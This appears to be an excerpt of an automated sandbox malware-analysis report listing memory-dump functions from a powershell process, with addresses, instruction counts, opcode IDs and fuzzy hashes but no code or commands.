                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_8310000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: d66056f0b293b2da1b615b78025b4c50e7b40970b90f8168e516fa591fdbf9b6
                                                                                                                • Instruction ID: ce0d2f9aa6405c4529e6b88d46de27545d36f89f867737de3396e9ef2828f703
                                                                                                                • Opcode Fuzzy Hash: d66056f0b293b2da1b615b78025b4c50e7b40970b90f8168e516fa591fdbf9b6
                                                                                                                • Instruction Fuzzy Hash: 67223730B04200DFCF18DBA8C851AAABBF6EFC5A12F14846ED5559B751DB35CC52CBA1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0870A5A0 Relevance: .5, Instructions: 523COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.25189068439.0000000008700000.00000040.00000800.00020000.00000000.sdmp, Offset: 08700000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_8700000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 97f3fe0b7f79786dd8b0af228eae56116d3cd50ca4073b55c3fbebae97aef048
                                                                                                                • Instruction ID: 67fc3a346b5d3859d40a3d3e1cced99e9067aebb82fd0f1a43787032177539e8
                                                                                                                • Opcode Fuzzy Hash: 97f3fe0b7f79786dd8b0af228eae56116d3cd50ca4073b55c3fbebae97aef048
                                                                                                                • Instruction Fuzzy Hash: 89223634A00318DFCB14DFA8D594A9ABBF2EF88315F148569E416AB394DB35ED42CF90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 08312377 Relevance: .5, Instructions: 492COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.25183602829.0000000008310000.00000040.00000800.00020000.00000000.sdmp, Offset: 08310000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_8310000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: d5af2b149454400e2f0dcb73d88f7703ef30de72523c0f1422f5e1b4d200a5cf
                                                                                                                • Instruction ID: eb4d3324926c28813a49f8b99ca873df0f5aeee508762fbc2aad58ed4791c9a2
                                                                                                                • Opcode Fuzzy Hash: d5af2b149454400e2f0dcb73d88f7703ef30de72523c0f1422f5e1b4d200a5cf
                                                                                                                • Instruction Fuzzy Hash: A0126B34A00205DFCF28DB94D540AAEF3B6EFC8B16F14892EE9566B745C771A842CB51
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 08311D1E Relevance: .5, Instructions: 485COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.25183602829.0000000008310000.00000040.00000800.00020000.00000000.sdmp, Offset: 08310000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_8310000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: d9c1a5e49c5d2a8e59d403020f8a5b4683a606336c23a026e12e15cf7e2ac89a
                                                                                                                • Instruction ID: 7292f87f0f2dc49a73399eb984c5078a25a9c19731ab92e719b4a2c20db00466
                                                                                                                • Opcode Fuzzy Hash: d9c1a5e49c5d2a8e59d403020f8a5b4683a606336c23a026e12e15cf7e2ac89a
                                                                                                                • Instruction Fuzzy Hash: 6F126A34A00214DFCF28DF94D580AAEF3B2EFC9B16F18856EE9556B744C772A842CB51
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 08305F28 Relevance: .5, Instructions: 481COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.25183069224.0000000008300000.00000040.00000800.00020000.00000000.sdmp, Offset: 08300000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_8300000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: e06c10db16a2521e69d89c0f292a5fbabd51fce1fd045ea932a59dac6fcfb734
                                                                                                                • Instruction ID: 1300eb62e2c0e20a90f96f93e54c5ae228b3f56334fed4492943380f5440e630
                                                                                                                • Opcode Fuzzy Hash: e06c10db16a2521e69d89c0f292a5fbabd51fce1fd045ea932a59dac6fcfb734
                                                                                                                • Instruction Fuzzy Hash: 14127974B002049FCB14DFA8D5A5AADB7F6EF88311F1144A9E402AB3A5DB71ED42CF90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 087087B8 Relevance: .5, Instructions: 457COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.25189068439.0000000008700000.00000040.00000800.00020000.00000000.sdmp, Offset: 08700000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_8700000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: e681635ca06e0ac3fef0cd8c03a4e2e23b94cde317ee30943b8bd75c04299849
                                                                                                                • Instruction ID: 9361c4295f3a529de2d5d89cfb2e4c49677f9b106033de20abafb5fcc978ce1a
                                                                                                                • Opcode Fuzzy Hash: e681635ca06e0ac3fef0cd8c03a4e2e23b94cde317ee30943b8bd75c04299849
                                                                                                                • Instruction Fuzzy Hash: C7F1AF34704304DFDB15CFA8C954BAA7BE6EB88345F0484ADE905DB398DB78D841CBA2
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 08709278 Relevance: .4, Instructions: 446COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.25189068439.0000000008700000.00000040.00000800.00020000.00000000.sdmp, Offset: 08700000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_8700000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: fcaeec00e2eba72806e2d3e210d4bacb47f4000d234419760089d0899732f28c
                                                                                                                • Instruction ID: 02730936906b23468fb6a152d7abc5cda3455f9ab520b9a9ef2b8c037f52645b
                                                                                                                • Opcode Fuzzy Hash: fcaeec00e2eba72806e2d3e210d4bacb47f4000d234419760089d0899732f28c
                                                                                                                • Instruction Fuzzy Hash: 59024C34B00204CFDB14DFA8D894BAEBBF6AF88315F158469E915AB395DB74D842CF60
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 08308078 Relevance: .4, Instructions: 437COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.25183069224.0000000008300000.00000040.00000800.00020000.00000000.sdmp, Offset: 08300000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_8300000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 9aa97f6401326ef28b5d3b77e1d7f3b9bf67801fa30af0674cf9c8f4f2c2eb3f
                                                                                                                • Instruction ID: 257634493945929b9a1faa29b52eceb598fb02c51e894a575839fb228f5ad765
                                                                                                                • Opcode Fuzzy Hash: 9aa97f6401326ef28b5d3b77e1d7f3b9bf67801fa30af0674cf9c8f4f2c2eb3f
                                                                                                                • Instruction Fuzzy Hash: FD02B0747002048FCB14DF68D964AAEB7F6EFC8315B198968D946AB781DB34EC42CF90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 08310A58 Relevance: .4, Instructions: 428COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.25183602829.0000000008310000.00000040.00000800.00020000.00000000.sdmp, Offset: 08310000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_8310000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 62587c5b025556c345a9aea6cb8a83c99254cd0664e52f08b049adc76dfbeaaf
                                                                                                                • Instruction ID: e9fa5ccf0aa683174a8fd18c0d5f5a2bcb846a1bc0e3bd6e7a9e30d32c8c1ceb
                                                                                                                • Opcode Fuzzy Hash: 62587c5b025556c345a9aea6cb8a83c99254cd0664e52f08b049adc76dfbeaaf
                                                                                                                • Instruction Fuzzy Hash: 9EE10230700604CFCB1C9F68C421AAABBE6EFC5A16F14C46EE4559B651DB31DC92CBA2
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 08706730 Relevance: .4, Instructions: 427COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.25189068439.0000000008700000.00000040.00000800.00020000.00000000.sdmp, Offset: 08700000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_8700000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 32994d2dce8a3a4a60987b98553ddb567c3c9e3ef9c9ec66fefc082d0b361037
                                                                                                                • Instruction ID: 2988aa47a6154d13756f2a2316fb1a527ec4b7a2ac5918cf0c5b1639674b9452
                                                                                                                • Opcode Fuzzy Hash: 32994d2dce8a3a4a60987b98553ddb567c3c9e3ef9c9ec66fefc082d0b361037
                                                                                                                • Instruction Fuzzy Hash: E702E874A00218CFCB14DFA8D894A9DBBF6FF89305F258569D416AB3A5DB34AC42CF50
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0870D170 Relevance: .4, Instructions: 413COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.25189068439.0000000008700000.00000040.00000800.00020000.00000000.sdmp, Offset: 08700000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_8700000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 57960faab28bcb2a5b335220916143d065da861d8b020335827206661e052d7f
                                                                                                                • Instruction ID: 98283e7308643655012baf537eb0f3d6444df183e72858b7bdf61a69184b6e19
                                                                                                                • Opcode Fuzzy Hash: 57960faab28bcb2a5b335220916143d065da861d8b020335827206661e052d7f
                                                                                                                • Instruction Fuzzy Hash: 93E17C34B00304CFEB14DBA9D854BAEBBE6AB88315F158169E905DB395EB74DC41CFA0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 08707DC0 Relevance: .4, Instructions: 381COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.25189068439.0000000008700000.00000040.00000800.00020000.00000000.sdmp, Offset: 08700000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_8700000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: cc6acc54eafb0249b81204249d566ca09845cf9116f832ea783ce54046d2026d
                                                                                                                • Instruction ID: d9d1d40df1d029e1be937aac68abfa52795601b9b18277453bc59a7261adc1c7
                                                                                                                • Opcode Fuzzy Hash: cc6acc54eafb0249b81204249d566ca09845cf9116f832ea783ce54046d2026d
                                                                                                                • Instruction Fuzzy Hash: 2CF12F74A00204DFCB04DFA8D994A9DBBF2FF88311F158569E416AB3A4CB75AC42CF51
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 08301100 Relevance: .3, Instructions: 344COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.25183069224.0000000008300000.00000040.00000800.00020000.00000000.sdmp, Offset: 08300000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_8300000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: f91866f80024f4ef1451d0adb9bf17c568157a49e30ade8269c607e588994421
                                                                                                                • Instruction ID: 7c046c528461b68b2a4db28fa19af0d155e21b12f3450affbe6f9a1291140b60
                                                                                                                • Opcode Fuzzy Hash: f91866f80024f4ef1451d0adb9bf17c568157a49e30ade8269c607e588994421
                                                                                                                • Instruction Fuzzy Hash: 91E14634A002488FD704DF94C165BEEBBA2EF81305F16C8B8D05A6F6B5DB75EC468B52
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0870DEA8 Relevance: .3, Instructions: 306COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.25189068439.0000000008700000.00000040.00000800.00020000.00000000.sdmp, Offset: 08700000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_8700000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 984b62fb7127c1dc74faf8413900eeb9e36a3728dd3a42e85c5d1562eb719a2f
                                                                                                                • Instruction ID: e3d297f1fa55b94982f78955d21ccca20960c4db1b59a06da94a3eb302cc5c36
                                                                                                                • Opcode Fuzzy Hash: 984b62fb7127c1dc74faf8413900eeb9e36a3728dd3a42e85c5d1562eb719a2f
                                                                                                                • Instruction Fuzzy Hash: 48C19331A04204DFCB14DFA9D854AAEBBF6EF89301F14896DE4159B394DB74AD42CFA0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0870DA00 Relevance: .3, Instructions: 283COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.25189068439.0000000008700000.00000040.00000800.00020000.00000000.sdmp, Offset: 08700000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_8700000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 032d6f3d9f9d31fce7ee1ba999c2f14433bdbf82213469e3e3e5ef0765f9477c
                                                                                                                • Instruction ID: 83d28e202cbcaf429d175c8ddcb41b65a9c1167012d14133b1da55f7542203c2
                                                                                                                • Opcode Fuzzy Hash: 032d6f3d9f9d31fce7ee1ba999c2f14433bdbf82213469e3e3e5ef0765f9477c
                                                                                                                • Instruction Fuzzy Hash: BBA19C38B00204CFCB15DBA9D854AAEBBF6AFC8355B098069E509DB395DB74DC41CBA1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 083DAF88 Relevance: .3, Instructions: 280COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.25186949754.00000000083D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 083D0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_83d0000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 5a4685e43da8d14943940e80ed7ce4e7b3cdd45ec383694a3c4d94f4ff8036c1
                                                                                                                • Instruction ID: 5a8d78e2c364907a89d0387418e160b6d9d31d828e1824b8b5b0f91d89e96def
                                                                                                                • Opcode Fuzzy Hash: 5a4685e43da8d14943940e80ed7ce4e7b3cdd45ec383694a3c4d94f4ff8036c1
                                                                                                                • Instruction Fuzzy Hash: D2C14775A00349CFDB14CFA4D454BAEBBB2EF84312F158469E805AF6A4DB34EC86CB50
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 08313C57 Relevance: .3, Instructions: 279COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.25183602829.0000000008310000.00000040.00000800.00020000.00000000.sdmp, Offset: 08310000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_8310000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 37047c74702c7b1751f0ae031e2cba46b5ffe39c9e869031b44b2994fa723df0
                                                                                                                • Instruction ID: b5a2f62c355fcf268b6f82b638847272ee563dc13f2378987e629914993adfad
                                                                                                                • Opcode Fuzzy Hash: 37047c74702c7b1751f0ae031e2cba46b5ffe39c9e869031b44b2994fa723df0
                                                                                                                • Instruction Fuzzy Hash: 2B912731B04200DFCF189BA48851AAABBB2EFC5B12F14C4AED4169F751DB35DC56CBA1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 08708310 Relevance: .3, Instructions: 266COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.25189068439.0000000008700000.00000040.00000800.00020000.00000000.sdmp, Offset: 08700000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_8700000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 72b45e64e6761968234e71f90e30be3876211c2c76acc066e0d105500d0d0549
                                                                                                                • Instruction ID: 0e4e2b78ed5897907f049f6a67c75dafe6649795ee76e0f8a05cc62000e0e0d3
                                                                                                                • Opcode Fuzzy Hash: 72b45e64e6761968234e71f90e30be3876211c2c76acc066e0d105500d0d0549
                                                                                                                • Instruction Fuzzy Hash: A3A18034A00244CFCB04DBA8C954AAEBBF6EF89311F15C569D85AAB395DB34EC41CF61
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 083D9F00 Relevance: .3, Instructions: 257COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.25186949754.00000000083D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 083D0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_83d0000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 65e9b3568e4daa4638eb38a9167645273757d6439901961c0596a901d25d945a
                                                                                                                • Instruction ID: 5fccb7f414a9ae38041e903abb3ca8ed0484cdf15463871b5faeb9ecd9019219
                                                                                                                • Opcode Fuzzy Hash: 65e9b3568e4daa4638eb38a9167645273757d6439901961c0596a901d25d945a
                                                                                                                • Instruction Fuzzy Hash: BAA14635A00214CFCB18DF65E954AADBBB2FF88316F15856DE8169B3A0DB35EC42CB40
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 08304858 Relevance: .3, Instructions: 255COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.25183069224.0000000008300000.00000040.00000800.00020000.00000000.sdmp, Offset: 08300000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_8300000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 7cbb149d0273c39ef7db070863360552da0eadd6a3b2cb07d4b6961507c5141e
                                                                                                                • Instruction ID: d7cdbde565c31f1cbfd992b3cf3539f037b08181bc949a34653170d5b809ae68
                                                                                                                • Opcode Fuzzy Hash: 7cbb149d0273c39ef7db070863360552da0eadd6a3b2cb07d4b6961507c5141e
                                                                                                                • Instruction Fuzzy Hash: F2A17C753002058FC704EBA4C995AEABBA7EFC5208B458E68D4868F764DF70FD178B91
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 08306EC8 Relevance: .3, Instructions: 252COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.25183069224.0000000008300000.00000040.00000800.00020000.00000000.sdmp, Offset: 08300000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_8300000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 8cfec2ae5c73126169b4568af5a835f3ebc850de647ba0f937ef8471e9d8c8c6
                                                                                                                • Instruction ID: d632a101a1f4d3fa14380cd5264e25609464bc6faf3e1d945dc131bf8a7a2a31
                                                                                                                • Opcode Fuzzy Hash: 8cfec2ae5c73126169b4568af5a835f3ebc850de647ba0f937ef8471e9d8c8c6
                                                                                                                • Instruction Fuzzy Hash: A181E4347002048FC714EFB8D895AAF77AAEFC8315B14896DE5069B794DF34ED428B91
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 08310B51 Relevance: .2, Instructions: 237COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.25183602829.0000000008310000.00000040.00000800.00020000.00000000.sdmp, Offset: 08310000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_8310000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: f44a98bc778e9313358088e8019cd6a49c4b632683d4cdf24fee8bc85e2e4db3
                                                                                                                • Instruction ID: 0250df21cffe57fef3d051c0132fc50e26d1c6ba3cef7cd91d660b5aefe4f581
                                                                                                                • Opcode Fuzzy Hash: f44a98bc778e9313358088e8019cd6a49c4b632683d4cdf24fee8bc85e2e4db3
                                                                                                                • Instruction Fuzzy Hash: CA91AF30700604CFCB2CDF68C565AAA77F6AFC5B12F1584AEE8059B691C771EC92CB52
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 083DF6DE Relevance: .2, Instructions: 236COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.25186949754.00000000083D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 083D0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_83d0000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: a6989d30230797f127ee8d95e681d955c114df8433d9619ec96d35eab1f4a21f
                                                                                                                • Instruction ID: 6fa6e40d5635da14de53f86ab91d8d5f1ef6bae139a7d4acdc2ee4a30cfbd286
                                                                                                                • Opcode Fuzzy Hash: a6989d30230797f127ee8d95e681d955c114df8433d9619ec96d35eab1f4a21f
                                                                                                                • Instruction Fuzzy Hash: 89919A36A00309DFCB10EFA4D580A9DBBB6EF84306F14C969D84A8F654DB30ED56CB91
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 08312CF9 Relevance: .2, Instructions: 235COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.25183602829.0000000008310000.00000040.00000800.00020000.00000000.sdmp, Offset: 08310000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_8310000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 2ce4ef5ae05d1ad5ee848cc2fe9b7058f9a009663365708f0cde26d8a6e6a511
                                                                                                                • Instruction ID: fec314e9f6a3f42363fd38f119c5d1b8277730cade8d224eba42e0a416c3a0d9
                                                                                                                • Opcode Fuzzy Hash: 2ce4ef5ae05d1ad5ee848cc2fe9b7058f9a009663365708f0cde26d8a6e6a511
                                                                                                                • Instruction Fuzzy Hash: BE819230B00204DFCF18DF98C945AAAB7F6AFC8A12F1984AAE415AB355C771DC51CBA1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0870B5DA Relevance: .2, Instructions: 232COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.25189068439.0000000008700000.00000040.00000800.00020000.00000000.sdmp, Offset: 08700000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_8700000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: a7d353e8647b964dd4234ff956fd308d50f8bf9ad5e8dae5761b93082cd0c6a1
                                                                                                                • Instruction ID: 7b9671a5ae73c4045d39a7d89b21e72959008b843a1ff6038d808fdb52b9fb76
                                                                                                                • Opcode Fuzzy Hash: a7d353e8647b964dd4234ff956fd308d50f8bf9ad5e8dae5761b93082cd0c6a1
                                                                                                                • Instruction Fuzzy Hash: 8CA13C34A04204DFDB15DFA8C894BADBBB2FF88315F558069E405AB396CB74E981CF91
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 083DF3D0 Relevance: .2, Instructions: 231COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.25186949754.00000000083D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 083D0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_83d0000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: eba70b3ac465e78730bcad73d0a45d1f14d1904878eeb6396cb1d97610fa8086
                                                                                                                • Instruction ID: e20bb37a941d3f893206b4af9ed91ddbce83608883982bf1d13391ea436afa38
                                                                                                                • Opcode Fuzzy Hash: eba70b3ac465e78730bcad73d0a45d1f14d1904878eeb6396cb1d97610fa8086
                                                                                                                • Instruction Fuzzy Hash: D491CD30A00309DFCB04DFA4C590AEEBBB6EFC9304F15856AE805AB355DB74AD46CB90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 08304857 Relevance: .2, Instructions: 219COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.25183069224.0000000008300000.00000040.00000800.00020000.00000000.sdmp, Offset: 08300000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_8300000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 1c19dfd8f080a2b078f98ef6d0ad8e5fb1d8b4b9c70795f39b2a784ba5b3fc3c
                                                                                                                • Instruction ID: 5c6ed0ed09d4bb34b9171e520fb196edf59eb1dbfec1fa2b1f3335273ec0c75e
                                                                                                                • Opcode Fuzzy Hash: 1c19dfd8f080a2b078f98ef6d0ad8e5fb1d8b4b9c70795f39b2a784ba5b3fc3c
                                                                                                                • Instruction Fuzzy Hash: 7A814D752006059FC704EF68C991BAAB7A7EFC4208B458E68D4868F764DF70FD178B91
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 08707738 Relevance: .2, Instructions: 217COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.25189068439.0000000008700000.00000040.00000800.00020000.00000000.sdmp, Offset: 08700000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_8700000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: a9c23d55431893512537af56ba4a94d2f728b71342e7a80b4751fced5092077b
                                                                                                                • Instruction ID: 70b219b8aeb1a45f23fef4863b91ae23d7cdf2d38b7d3ebfca132de37081cb19
                                                                                                                • Opcode Fuzzy Hash: a9c23d55431893512537af56ba4a94d2f728b71342e7a80b4751fced5092077b
                                                                                                                • Instruction Fuzzy Hash: C0917134A00208DFCB08DFA9D955AEE7BF6EF88351F148469E805AB394DB35AD41CF60
